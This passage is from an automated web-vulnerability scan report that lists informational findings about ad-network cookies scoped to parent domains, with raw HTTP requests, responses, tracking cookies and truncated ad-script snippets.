Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CEJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCe; PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR; PRimp=7DA20400-C8FF-C732-0209-A310000A0200; PRca=|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 13:59:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 11740
Set-Cookie:PRvt=CFJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAY0aKAxsCAe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=D8A20400-6340-8A46-0309-A4900C6C0200; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

9.10. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=I10982 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoymsoZetPIFP0ffNDfMLjjNFIzKlvZuUgbFfaFOL6AbG7GUvAjTSSs+fN0pT1Ek1A1O3Uawg8CYDi1iW8H0kygALN2qJ+ws9ZOH3ugpCLaZ5feHz0JxquchN2/rq+HLLuOZ0VKwgyhnjOvVX8lAqNNGQnydj1ObQFnZ3eyoEiP2frlPEGSBPv7VbJ1gOdXtavZhpvWa4MynECuel295hxlggN5joS+oH68R/BvNNYxTBk/8bUbqkGRIF2YopY8aJfkRkxg7A==; rtc_Wdkl=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; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; 
udm_0=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; rsiPus_--QM="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"; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_--QM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_--QM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_7Gnt="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:58 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

9.11. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?record_activation&rsi_dpr=1274605-56918-315889-715901-1023315-725071-1268392-1198035-1049794-1238051-74560-593881-1264419-86237-926097-1006089-1196051-1147048-1086731-1284585-1086733-1044410-1093100-1063912-397181-1044578-1063916-1041270-1049769-1049770-596293-576685-1044587-596291-1049772-1063911-1063910 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rtc_dGQ8=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; udm_0=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; rsiPus_xqR7="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"; rsi_us_1000000="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"; rsi_segs_1000000=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xqR7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xqR7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TX2x="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 13:59:44 GMT

GIF89a.............!.......,...........D..;

9.12. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_random=208878393&rsi_pub=E083D538668BB69EC4795771A0EDA581&rsi_site=626E5E04865D079794DE6011BF30AD87&rsi_width=728&rsi_height=90&rsi_secure=0&rsi_url=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&rsi_referrer=&rsi_title=Highly%20publicized%20murder%20of%20Caylee%20Anthony%20rivets%2C%20enrages%20%7C%20FLORIDA%20TODAY%20%7C%20floridatoday.com&rsi_inf=0 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; 
rsiPus_oJ6I="MLsXrqEO5ihr4JB0esFCP3iTwKJkgx2gQRTIgLpbO5bzUKo5agSRamM8BUBiXf5iQVJE/qvOLDxrtPlWva+WFfRLnrsgVEgRJznRYvE/JCbIJlFRZ0v8lk2FMP7VgY0aDJ1uvr3sxbowAuFyRMBuLfYcr6fFEv89nuq04UGKmDchPxvf1VTgDWJTEx5Kkr8jzQunm+6oPneCoGtSQhyGHZzxdfyY9pzlPM/onuX9X2JdmNFRliGjpOxxE+0pD+DBZZWgpAquHQkJ1YB5V5px1bD3K+pKttxiYRyYsLRuin4AdpE+D57tHyWhDKXYnaxmhDlbT40RVZTlQWa5SHr/yRW15cgoL2BTNz4ZHIOIbZ3w+GOVtetiHdAwjqA5Ui4WrA6bK25LLI4Ir9sIh2o24VUvkbMIaqCDNsF2jNanIWOT86v7ILEO8GTv7ysgdBPV7GNAhaATIC6+9HWKklodYgNie3KEsyxp4Ip53yIQktBt7x0rOG5/65JnmRP6pZbn0beJZ9e2WzN097dXeixXnHdq6JFVAyAbmpVkkwNOY+wWd6dg4Jf/QXM8CJVkFVKLOlMwzlBml/4yW2mwTMAgsUWTbJEe3D5h5Qu+avLmgFYgCdm3afOE65XEGgbY6gQI2QyUKfE89OzxvQEeuV8Z29PLI2LFlmgFNy3CKVxZ5PwiIOfTemnz/u34vuwdvk5OwPoIKx6wc64f4XUyQCxKRAMtrDlD3lqOkddwPiQPQWSdxvqE7+8qAf4lJEA0RdLVS+EOIKQcs4IiqbmLClAFvanxVnt8+DAJ/at8TweJdiurVsUJ39ifvys0hlSV/6J8xDBFRvnTXW7RHu077j5I8EhkX0VLoUvlsoHLXJRFSkMMdD1Rjk6kj6u7MTXab7InNjSHU6mj9FV6J71+hVaENmvO6xRYxe8DwuUoxcZGfl++Mz5gpSVkriCBhEEVGAa0whhl40WBypkKGx6ytK8eGBxCHtMy7YXpAt8GVfXO2nHdDF5NRbljpX5a2idAiaY9hZRKaSwdCl0zO8qy8rZheiOX4dGOkvvILbHnPIk="; rsi_us_1000000="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"; rsi_segs_1000000=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; rtc_Wdkl=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; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_oJ6I=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_oJ6I=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_D-6M="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:29 GMT
Content-Length: 1582

document.write('<script src="http://ad.yieldmanager.com/imp?Z=728x90&s=1806342&r=1&_salt=2127245864&u=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-mu
...[SNIP]...

9.13. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=J06575 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUP15EOheQIMp6aIYFMFwqgWKICRGi4LkSGHuoVo77dVqa7OUgcXqUqruxUK6pw26DoqAlJFLZfT4Ux5SbqTCquHuUc/XRFeRyFWPT6EN6ib9rOgornIgakmFz75BmUiSaHo+JZst/oPR9Zq4Tt2uVGJOix55hSkJ3LJKPQI1gnqJcPO+B0wk0qpMSQXyFuCqQpK8r5tYBj/bmtqBKECRDiwMULcazzRzzBdevJ3YZlw1fzc91DujPMvIrU3lBGHD+Oj3GY34vTCgAsALTSPABX9K+qdf26V67jxb2rFhuao8e8wHgc9RUGL1UarXrcKQoVg0O/dT54uSAyDaigAqzmSFzhzgmZT9BJMxPzc4NCP+DgolO7MVTtmzKnuBLvpPBvKHLv25Ok9kGqHBB+5DATvbNCMmEyH/IFwSZOzLes1MyDqRGKgNkRhQbjaoTJLPdtrCZICmiIGgDOjcsfvI7HUAbHc5uDjeMNE0BTWYE73Cg/viOkfNPjdw0BwOKK7W5JcIsu2UEjjN2Zn/OkFtTDweZtF; rtc_dGQ8=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; rsiPus_wuF1="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"; rsi_us_1000000="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"; 
udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_wuF1=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wuF1=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_dJdc="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:42 GMT
Content-Length: 1315

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

9.14. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?record_activation&rsi_dpr=1274605-56918-315889-715901-1023315-725071-1268392-1198035-1049794-1238051-75921-74560-593881-1264419-86237-926097-1006089-1196051-1147048-1086731-1284585-1086733-1044410-1093100-1063912-397181-1044578-1063916-1041270-1049769-1049770-596293-576685-596291-1044587-1049772-1063911-1063910 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
